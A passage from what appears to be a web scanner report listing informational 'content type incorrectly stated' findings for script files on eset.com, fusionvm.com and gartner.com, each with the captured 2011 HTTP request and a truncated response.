X-Powered-By: PHP/5.2.6-1+lenny4
Cache-Control: max-age=604800
Vary: Accept-Encoding
Expires: Mon, 02 May 2011 14:23:41 GMT
Content-Length: 52089

try{stManager.done('lang0_0.js');}catch(e){}
Aboutme='. ....:';
Acad_status='......:';
Acad_status_bach='....... (........)';
Acad_status_bach_fm='......... (........)';
Acad_status_ent='..........';

...[SNIP]...
35.75. http://www.eset.com/us/scripts/business.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/business.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/business.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:52:46 GMT
X-Varnish: 1310965301
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 2557

var ESET_Business = {
init: function() {
// check for product dropdowns
if($('business_dropdown_eav')) {
this.setProductDropdown('eav');
}
if($('business_dropdown_eavmac'
...[SNIP]...
35.76. http://www.eset.com/us/scripts/common.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/common.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/common.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B; mbox=PC#1303736347554-914602.17#1304952755|check#true#1303743215|session#1303743154006-383984#1303745015

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 14:52:23 GMT
X-Varnish: 555585940
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 934

var Common = {};

Common.Ticker = new Class({
Implements: Options,
options: {
items: [],
link_id: 'ticker-link',
duration: 4000
},

initialize: function(id, options) {

...[SNIP]...
35.77. http://www.eset.com/us/scripts/elqNow/elqCfg.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/elqNow/elqCfg.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/elqNow/elqCfg.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:52:46 GMT
X-Varnish: 1310965312
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 3070

//------------------------------------------------------
// Copyright Eloqua Corporation.
//
var elqSiteID = '2208';
var elqVer = 'v200';
//
var elqERoot = 'now.eloqua.com/';
var elqSecERoot =
...[SNIP]...
35.78. http://www.eset.com/us/scripts/elqNow/elqImg.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/elqNow/elqImg.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/elqNow/elqImg.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:52:46 GMT
X-Varnish: 1310965309
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 894

// Copyright Eloqua Corporation.
var elqWDt = new Date(20020101);
var elqDt = new Date();
var elqMs = elqDt.getMilliseconds();
var elqTzo = elqWDt.getTimezoneOffset();
var elqRef2 = '';
if (type
...[SNIP]...
35.79. http://www.eset.com/us/scripts/lib/autocompleter/Autocompleter.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/lib/autocompleter/Autocompleter.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/autocompleter/Autocompleter.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:52:46 GMT
X-Varnish: 1310965305
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 10881

var Observer=new Class({Implements:[Options,Events],options:{periodical:false,delay:1000},initialize:function(c,a,b){this.element=$(c)||$$(c);this.addEvent("onFired",a);this.setOptions(b);this.bound=t
...[SNIP]...
35.80. http://www.eset.com/us/scripts/lib/jq-promo-lib.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/lib/jq-promo-lib.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/jq-promo-lib.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B; mbox=check#true#1303736408|session#1303736347554-914602#1303738208

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:58:57 GMT
X-Varnish: 1310978029
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 154

var j = jQuery.noConflict();

j(document).ready(function(){
   j('.promoRadio').click(function(){
       j('.promocode').val(j(this).attr('alt'));
   });
});
35.81. http://www.eset.com/us/scripts/lib/jq.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/lib/jq.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/jq.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B; mbox=check#true#1303736408|session#1303736347554-914602#1303738208

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:58:57 GMT
X-Varnish: 1310978027
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 78768

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Incl
...[SNIP]...
35.82. http://www.eset.com/us/scripts/lib/mbox.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/lib/mbox.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/mbox.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:58:55 GMT
X-Varnish: 1310977886
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 20200

var mboxCopyright = "&copy; 1996-2008. Omniture, Inc. All rights reserved.";mboxUrlBuilder = function(a, b) { this.a = a; this.b = b; this.c = new Array(); this.d = function(e) { return e; }; this.f =
...[SNIP]...
35.83. http://www.eset.com/us/scripts/lib/mootools-1.2.3-core-yc.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/lib/mootools-1.2.3-core-yc.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/mootools-1.2.3-core-yc.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:52:45 GMT
X-Varnish: 1310965283
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 66610

//MooTools, <http://mootools.net>, My Object Oriented (JavaScript) Tools. Copyright (c) 2006-2009 Valerio Proietti, <http://mad4milk.net>, MIT Style License.

var MooTools={version:"1.2.3",build:"4980
...[SNIP]...
35.84. http://www.eset.com/us/scripts/lib/s_code3.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/lib/s_code3.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/s_code3.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:52:46 GMT
X-Varnish: 1310965306
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 80333


/* SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */
/************************ ADDITIONAL FEATURES ***********
...[SNIP]...
35.85. http://www.eset.com/us/scripts/store.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/store.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/store.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B; mbox=check#true#1303736408|session#1303736347554-914602#1303738208

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:58:57 GMT
X-Varnish: 1310978028
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 10967

var ESET_Store = {
selected: [],
renew_prices: {},
eav_radio_checked: false,
ess_radio_checked: false,


init: function() {
this.setTabEvents();
this.setRenewQuantity();
...[SNIP]...
35.86. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopDefault.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
Origin: https://www.fusionvm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB; CriticalWatch_WinMgmt=1ea476ea-f298-43b7-b986-76b4c2ad1a2b; ASP.NET_SessionId=ldofgy3miecclj01ixxgal4x; __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; __utmc=61526075; __utmb=61526075.1.10.1303736107
Content-Length: 5126

_IG_CSS_LINKS_=&ctl01xDesktopThreePanes1xThreePanesxctl05xAdvisoriesGrid=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$password=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Mon, 25 Apr 2011 12:54:56 GMT
Content-Length: 5335

/FusionVM/Images/FooterBackground2.gif/FusionVM/Images/CW-Logo-NoTag-Rev-MinSize.gif20112011.3.0.27<&>0ctl01$Banner$UserSessionTimer1$WebAsyncRefreshPanel1<&>0_0.08469181740656495<&>0ctl01$Banner$User
...[SNIP]...
35.87. http://www.gartner.com/include/webtrends.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gartner.com
Path:   /include/webtrends.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /include/webtrends.jsp HTTP/1.1
Host: www.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/DisplayDocument?doc_cd=127481
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303732853510:ss=1303732853510; TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:10:48 GMT
Content-type: text/html; charset=ISO8859_1
Date: Mon, 25 Apr 2011 12:10:48 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
X-PvInfo: [S10203.C10821.A151026.RA0.G24F27.UD4EB7C80].[OT/html.OG/pages]
Vary: Accept-Encoding
Content-Length: 22376

<!-- START OF Advanced SmartSource Data Collector TAG -->
<!-- Copyright (c) 1996-2006 WebTrends Inc. All rights reserved.-->
<!-- $DateTime: 2006/03/09 14:15:22 $ -->
<!-- 2006/10/30: Modified by
...[SNIP]...
35.88. http://www.gartner.com/technology/include/metricsHelper.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gartner.com
Path:   /technology/include/metricsHelper.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /technology/include/metricsHelper.jsp HTTP/1.1
Host: www.gartner.com
Proxy-Connection: keep-alive
